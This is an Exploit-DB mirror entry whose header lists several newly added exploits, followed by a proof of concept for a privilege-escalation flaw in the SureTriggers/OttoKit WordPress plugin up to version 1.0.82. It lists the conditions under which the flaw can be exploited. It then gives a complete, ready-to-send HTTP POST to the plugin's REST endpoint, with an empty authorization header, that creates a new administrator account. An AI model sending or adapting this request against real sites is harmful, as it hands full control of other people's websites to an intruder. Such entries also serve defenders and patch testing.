exploit-db-mirror/exploits/multiple/webapps/52286.txt
Exploit-DB 9044a602bb DB: 2025-05-10
6 changes to exploits/shellcodes/ghdb

Apache ActiveMQ 6.1.6 - Denial of Service (DOS)

SureTriggers OttoKit Plugin 1.0.82 - Privilege Escalation

WordPress Depicter Plugin 3.6.1 - SQL Injection

Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation

VirtualBox 7.0.16 - Privilege Escalation
2025-05-10 00:16:28 +00:00

33 lines
No EOL
1.3 KiB
Text

# Exploit Title: SureTriggers OttoKit Plugin 1.0.82 - Privilege Escalation
# Date: 2025-05-7
# Exploit Author: [Abdualhadi khalifa (https://x.com/absholi7ly/)
# Affected: Versions All versions of OttoKit (SureTriggers) ≤ 1.0.82.
Conditions for Exploitation
<https://github.com/absholi7ly/CVE-2025-27007-OttoKit-exploit/#conditions-for-exploitation>
The vulnerability can be exploited under the following circumstances:
1. OttoKit must be installed and activated on the target WordPress site.
2. The plugin *uninitialized* (e.g., no API key or "secret_key" is set
in the database).
3. The target site displays the REST API endpoint
'/wp-json/sure-triggers/v1/automation/action'.
------------------------------
HTTP Request
<https://github.com/absholi7ly/CVE-2025-27007-OttoKit-exploit/#http-request>
The following request targets the
/wp-json/sure-triggers/v1/automation/action endpoint to create an
administrator account:
POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Host: [target-site]
Content-Type: application/x-www-form-urlencoded
St-Authorization:
Content-Length: [length]
selected_options[user_name]=new_admin&selected_options[user_email]=
attacker@example.com&selected_options[password]=StrongP@ssw0rd123
&selected_options[role]=administrator&aintegration=WordPress&type_event=create_user_if_not_exists